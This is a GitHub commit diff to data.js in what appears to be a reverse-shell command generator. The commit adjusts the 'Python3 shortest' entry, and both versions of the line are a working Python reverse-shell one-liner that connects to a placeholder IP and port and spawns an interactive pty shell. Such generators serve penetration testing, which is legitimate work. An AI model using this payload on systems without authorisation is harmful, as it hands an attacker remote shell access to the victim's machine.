Update data.js

Added shortest Python3 payload
This commit is contained in:
Ryan Montgomery 2021-05-30 10:49:38 -04:00 committed by GitHub
parent 95bf316ee7
commit 162b8b7a9a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -200,7 +200,7 @@ const reverseShellCommands = withCommandType(
},
{
"name": "Python3 shortest",
"command": "python3 -c'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
"command": "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'",
"meta": ["linux"]
},
{